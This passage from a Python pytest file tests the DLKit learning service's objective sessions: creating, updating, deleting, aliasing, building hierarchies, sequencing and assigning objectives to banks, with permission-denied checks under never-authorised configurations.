def objective_admin_session_test_fixture(request):
# From test_templates/resource.py::ResourceAdminSession::init_template
if not is_never_authz(request.cls.service_config):
request.cls.form = request.cls.catalog.get_objective_form_for_create([])
request.cls.form.display_name = 'new Objective'
request.cls.form.description = 'description of Objective'
request.cls.form.set_genus_type(NEW_TYPE)
request.cls.osid_object = request.cls.catalog.create_objective(request.cls.form)
request.cls.session = request.cls.catalog
def test_tear_down():
# From test_templates/resource.py::ResourceAdminSession::init_template
if not is_never_authz(request.cls.service_config):
request.cls.catalog.delete_objective(request.cls.osid_object.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_admin_session_class_fixture", "objective_admin_session_test_fixture")
class TestObjectiveAdminSession(object):
"""Tests for ObjectiveAdminSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_create_objectives(self):
"""Tests can_create_objectives"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resources_template
assert isinstance(self.catalog.can_create_objectives(), bool)
def test_can_create_objective_with_record_types(self):
"""Tests can_create_objective_with_record_types"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resource_with_record_types_template
assert isinstance(self.catalog.can_create_objective_with_record_types(DEFAULT_TYPE), bool)
def test_get_objective_form_for_create(self):
"""Tests get_objective_form_for_create"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_create_template
if not is_never_authz(self.service_config):
form = self.catalog.get_objective_form_for_create([])
assert isinstance(form, OsidForm)
assert not form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_objective_form_for_create([1])
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_objective_form_for_create([])
def test_create_objective(self):
"""Tests create_objective"""
# From test_templates/resource.py::ResourceAdminSession::create_resource_template
from dlkit.abstract_osid.learning.objects import Objective
if not is_never_authz(self.service_config):
assert isinstance(self.osid_object, Objective)
assert self.osid_object.display_name.text == 'new Objective'
assert self.osid_object.description.text == 'description of Objective'
assert self.osid_object.genus_type == NEW_TYPE
with pytest.raises(errors.IllegalState):
self.catalog.create_objective(self.form)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_objective('I Will Break You!')
update_form = self.catalog.get_objective_form_for_update(self.osid_object.ident)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_objective(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.create_objective('foo')
def test_can_update_objectives(self):
"""Tests can_update_objectives"""
# From test_templates/resource.py::ResourceAdminSession::can_update_resources_template
assert isinstance(self.catalog.can_update_objectives(), bool)
def test_get_objective_form_for_update(self):
"""Tests get_objective_form_for_update"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_update_template
if not is_never_authz(self.service_config):
form = self.catalog.get_objective_form_for_update(self.osid_object.ident)
assert isinstance(form, OsidForm)
assert form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_objective_form_for_update(['This is Doomed!'])
with pytest.raises(errors.InvalidArgument):
self.catalog.get_objective_form_for_update(
Id(authority='Respect my Authoritay!',
namespace='learning.{object_name}',
identifier='1'))
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_objective_form_for_update(self.fake_id)
def test_update_objective(self):
"""Tests update_objective"""
# From test_templates/resource.py::ResourceAdminSession::update_resource_template
if not is_never_authz(self.service_config):
from dlkit.abstract_osid.learning.objects import Objective
form = self.catalog.get_objective_form_for_update(self.osid_object.ident)
form.display_name = 'new name'
form.description = 'new description'
form.set_genus_type(NEW_TYPE_2)
updated_object = self.catalog.update_objective(form)
assert isinstance(updated_object, Objective)
assert updated_object.ident == self.osid_object.ident
assert updated_object.display_name.text == 'new name'
assert updated_object.description.text == 'new description'
assert updated_object.genus_type == NEW_TYPE_2
with pytest.raises(errors.IllegalState):
self.catalog.update_objective(form)
with pytest.raises(errors.InvalidArgument):
self.catalog.update_objective('I Will Break You!')
with pytest.raises(errors.InvalidArgument):
self.catalog.update_objective(self.form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.update_objective('foo')
def test_can_delete_objectives(self):
"""Tests can_delete_objectives"""
# From test_templates/resource.py::ResourceAdminSession::can_delete_resources_template
assert isinstance(self.catalog.can_delete_objectives(), bool)
def test_delete_objective(self):
"""Tests delete_objective"""
# From test_templates/learning.py::ObjectiveAdminSession::delete_objective_template
if not is_never_authz(self.service_config):
results = self.catalog.get_objectives()
assert results.available() == 1
form = self.catalog.get_objective_form_for_create([])
form.display_name = 'new Objective'
form.description = 'description of Objective'
new_objective = self.catalog.create_objective(form)
results = self.catalog.get_objectives()
assert results.available() == 2
self.session.delete_objective(new_objective.ident)
results = self.catalog.get_objectives()
assert results.available() == 1
assert str(results.next().ident) != str(new_objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.delete_objective(self.fake_id)
def test_can_manage_objective_aliases(self):
"""Tests can_manage_objective_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.catalog.can_manage_objective_aliases(), bool)
def test_alias_objective(self):
"""Tests alias_objective"""
# From test_templates/resource.py::ResourceAdminSession::alias_resource_template
if not is_never_authz(self.service_config):
alias_id = Id(self.catalog.ident.namespace + '%3Amy-alias%40ODL.MIT.EDU')
self.catalog.alias_objective(self.osid_object.ident, alias_id)
aliased_object = self.catalog.get_objective(alias_id)
assert aliased_object.ident == self.osid_object.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.alias_objective(self.fake_id, self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_hierarchy_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveHierarchySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_hierarchy_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_hierarchy_session_test_fixture(request):
request.cls.child_list = list()
request.cls.child_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveHierarchySession Lookup'
create_form.description = 'Test Objective for ObjectiveHierarchySession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
request.cls.catalog.add_root_objective(request.cls.objective.ident)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveHierarchySession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.child_list.append(obj)
request.cls.child_ids.append(obj.ident)
request.cls.catalog.add_child_objective(request.cls.objective.ident, obj.ident)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.catalog.remove_child_objectives(request.cls.objective.ident)
request.cls.catalog.remove_root_objective(request.cls.objective.ident)
for obj_id in request.cls.child_ids:
request.cls.catalog.delete_objective(obj_id)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_hierarchy_session_class_fixture", "objective_hierarchy_session_test_fixture")
class TestObjectiveHierarchySession(object):
"""Tests for ObjectiveHierarchySession"""
def test_get_objective_hierarchy_id(self):
"""Tests get_objective_hierarchy_id"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy_id()
def test_get_objective_hierarchy(self):
"""Tests get_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy()
def test_can_access_objective_hierarchy(self):
"""Tests can_access_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_access_objective_hierarchy()
def test_use_comparative_objective_view(self):
"""Tests use_comparative_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_objective_view()
def test_use_plenary_objective_view(self):
"""Tests use_plenary_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_objective_view()
def test_get_root_objective_ids(self):
"""Tests get_root_objective_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_root_objective_ids()
def test_get_root_objectives(self):
"""Tests get_root_objectives"""
if not is_never_authz(self.service_config):
roots = self.catalog.get_root_objectives()
assert roots.available() == 1
assert isinstance(roots, ObjectiveList)
assert str(roots.next().ident) == str(self.objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_root_objectives()
def test_has_parent_objectives(self):
"""Tests has_parent_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.has_parent_objectives(True)
def test_is_parent_of_objective(self):
"""Tests is_parent_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_parent_of_objective(True, True)
def test_get_parent_objective_ids(self):
"""Tests get_parent_objective_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_parent_objective_ids(True)
def test_get_parent_objectives(self):
"""Tests get_parent_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_parent_objectives(True)
def test_is_ancestor_of_objective(self):
"""Tests is_ancestor_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_ancestor_of_objective(True, True)
def test_has_child_objectives(self):
"""Tests has_child_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.has_child_objectives(True)
def test_is_child_of_objective(self):
"""Tests is_child_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_child_of_objective(True, True)
def test_get_child_objective_ids(self):
"""Tests get_child_objective_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_child_objective_ids(True)
def test_get_child_objectives(self):
"""Tests get_child_objectives"""
if not is_never_authz(self.service_config):
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 2
assert isinstance(children, ObjectiveList)
assert str(children.next().ident) == str(self.child_ids[0])
assert str(children.next().ident) == str(self.child_ids[1])
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_child_objectives(self.fake_id)
def test_is_descendant_of_objective(self):
"""Tests is_descendant_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_descendant_of_objective(True, True)
def test_get_objective_node_ids(self):
"""Tests get_objective_node_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_node_ids(True, True, True, True)
def test_get_objective_nodes(self):
"""Tests get_objective_nodes"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_nodes(True, True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_hierarchy_design_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveHierarchyDesignSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_hierarchy_design_session_test_fixture(request):
request.cls.child_list = list()
request.cls.child_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveHierarchyDesignSession Lookup'
create_form.description = 'Test Objective for ObjectiveHierarchyDesignSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveHierarchyDesignSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.child_list.append(obj)
request.cls.child_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_hierarchy_design_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj_id in request.cls.child_ids:
request.cls.catalog.delete_objective(obj_id)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_hierarchy_design_session_class_fixture", "objective_hierarchy_design_session_test_fixture")
class TestObjectiveHierarchyDesignSession(object):
"""Tests for ObjectiveHierarchyDesignSession"""
def test_get_objective_hierarchy_id(self):
"""Tests get_objective_hierarchy_id"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy_id()
def test_get_objective_hierarchy(self):
"""Tests get_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy()
def test_can_modify_objective_hierarchy(self):
"""Tests can_modify_objective_hierarchy"""
assert isinstance(self.catalog.can_modify_objective_hierarchy(), bool)
def test_add_root_objective(self):
"""Tests add_root_objective"""
if not is_never_authz(self.service_config):
roots = self.catalog.get_root_objectives()
assert roots.available() == 0
assert isinstance(roots, ObjectiveList)
self.catalog.add_root_objective(self.objective.ident)
roots = self.catalog.get_root_objectives()
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_root_objective(self.fake_id)
def test_remove_root_objective(self):
"""Tests remove_root_objective"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
roots = self.catalog.get_root_objectives()
assert roots.available() == 1
self.catalog.remove_root_objective(self.objective.ident)
roots = self.catalog.get_root_objectives()
assert roots.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_root_objective(self.fake_id)
def test_add_child_objective(self):
"""Tests add_child_objective"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
with pytest.raises(errors.IllegalState):
self.catalog.get_child_objectives(self.objective.ident)
self.catalog.add_child_objective(self.objective.ident, self.child_ids[0])
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 1
assert isinstance(children, ObjectiveList)
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_child_objective(self.fake_id, self.fake_id)
def test_remove_child_objective(self):
"""Tests remove_child_objective"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
self.catalog.add_child_objective(self.objective.ident, self.child_ids[0])
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 1
self.catalog.remove_child_objective(self.objective.ident, self.child_ids[0])
with pytest.raises(errors.IllegalState):
self.catalog.get_child_objectives(self.objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objective(self.fake_id, self.fake_id)
def test_remove_child_objectives(self):
"""Tests remove_child_objectives"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
self.catalog.add_child_objective(self.objective.ident, self.child_ids[0])
self.catalog.add_child_objective(self.objective.ident, self.child_ids[1])
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 2
self.catalog.remove_child_objectives(self.objective.ident)
with pytest.raises(errors.IllegalState):
self.catalog.get_child_objectives(self.objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objectives(self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_sequencing_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.child_list = list()
request.cls.child_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveSequencingSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_sequencing_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_sequencing_session_test_fixture(request):
request.cls.objective_list = list()
if not is_never_authz(request.cls.service_config):
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveSequencingSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj_id in request.cls.child_ids:
request.cls.catalog.delete_objective(obj_id)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_sequencing_session_class_fixture", "objective_sequencing_session_test_fixture")
class TestObjectiveSequencingSession(object):
"""Tests for ObjectiveSequencingSession"""
def test_get_objective_hierarchy_id(self):
"""Tests get_objective_hierarchy_id"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy_id()
def test_get_objective_hierarchy(self):
"""Tests get_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy()
def test_can_sequence_objectives(self):
"""Tests can_sequence_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_sequence_objectives()
def test_move_objective_ahead(self):
"""Tests move_objective_ahead"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.move_objective_ahead(True, True, True)
def test_move_objective_behind(self):
"""Tests move_objective_behind"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.move_objective_behind(True, True, True)
def test_sequence_objectives(self):
"""Tests sequence_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.sequence_objectives(True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_objective_bank_session_class_fixture(request):
# From test_templates/resource.py::ResourceBinSession::init_template
request.cls.service_config = request.param
request.cls.objective_list = list()
request.cls.objective_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveObjectiveBankSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
request.cls.svc_mgr.assign_objective_to_objective_bank(
request.cls.objective_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.assign_objective_to_objective_bank(
request.cls.objective_ids[2], request.cls.assigned_catalog.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.unassign_objective_from_objective_bank(
request.cls.objective_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.unassign_objective_from_objective_bank(
request.cls.objective_ids[2], request.cls.assigned_catalog.ident)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_objective_bank_session_test_fixture(request):
# From test_templates/resource.py::ResourceBinSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_objective_bank_session_class_fixture", "objective_objective_bank_session_test_fixture")
class TestObjectiveObjectiveBankSession(object):
"""Tests for ObjectiveObjectiveBankSession"""
def test_can_lookup_objective_objective_bank_mappings(self):
"""Tests can_lookup_objective_objective_bank_mappings"""
# From test_templates/resource.py::ResourceBinSession::can_lookup_resource_bin_mappings
result = self.session.can_lookup_objective_objective_bank_mappings()
assert isinstance(result, bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_objective_ids_by_objective_bank(self):
"""Tests get_objective_ids_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bin_template
if not is_never_authz(self.service_config):
objects = self.svc_mgr.get_objective_ids_by_objective_bank(self.assigned_catalog.ident)
assert objects.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_ids_by_objective_bank(self.fake_id)
def test_get_objectives_by_objective_bank(self):
"""Tests get_objectives_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bin_template
if not is_never_authz(self.service_config):
results = self.session.get_objectives_by_objective_bank(self.assigned_catalog.ident)
assert isinstance(results, ABCObjects.ObjectiveList)
assert results.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_objectives_by_objective_bank(self.fake_id)
def test_get_objective_ids_by_objective_banks(self):
"""Tests get_objective_ids_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
object_ids = self.session.get_objective_ids_by_objective_banks(catalog_ids)
assert isinstance(object_ids, IdList)
# Currently our impl does not remove duplicate objectIds
assert object_ids.available() == 5
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_objective_ids_by_objective_banks([self.fake_id])
def test_get_objectives_by_objective_banks(self):
"""Tests get_objectives_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
results = self.session.get_objectives_by_objective_banks(catalog_ids)
assert isinstance(results, ABCObjects.ObjectiveList)
# Currently our impl does not remove duplicate objects
assert results.available() == 5
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_objectives_by_objective_banks([self.fake_id])
def test_get_objective_bank_ids_by_objective(self):
"""Tests get_objective_bank_ids_by_objective"""
# From test_templates/resource.py::ResourceBinSession::get_bin_ids_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_bank_ids_by_objective(self.objective_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_ids_by_objective(self.fake_id)
def test_get_objective_banks_by_objective(self):
"""Tests get_objective_banks_by_objective"""
# From test_templates/resource.py::ResourceBinSession::get_bins_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_banks_by_objective(self.objective_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_objective(self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_objective_bank_assignment_session_class_fixture(request):
# From test_templates/resource.py::ResourceBinAssignmentSession::init_template
request.cls.service_config = request.param
request.cls.objective_list = list()
request.cls.objective_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankAssignmentSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveObjectiveBankAssignmentSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_objective_bank_assignment_session_test_fixture(request):
# From test_templates/resource.py::ResourceBinAssignmentSession::init_template
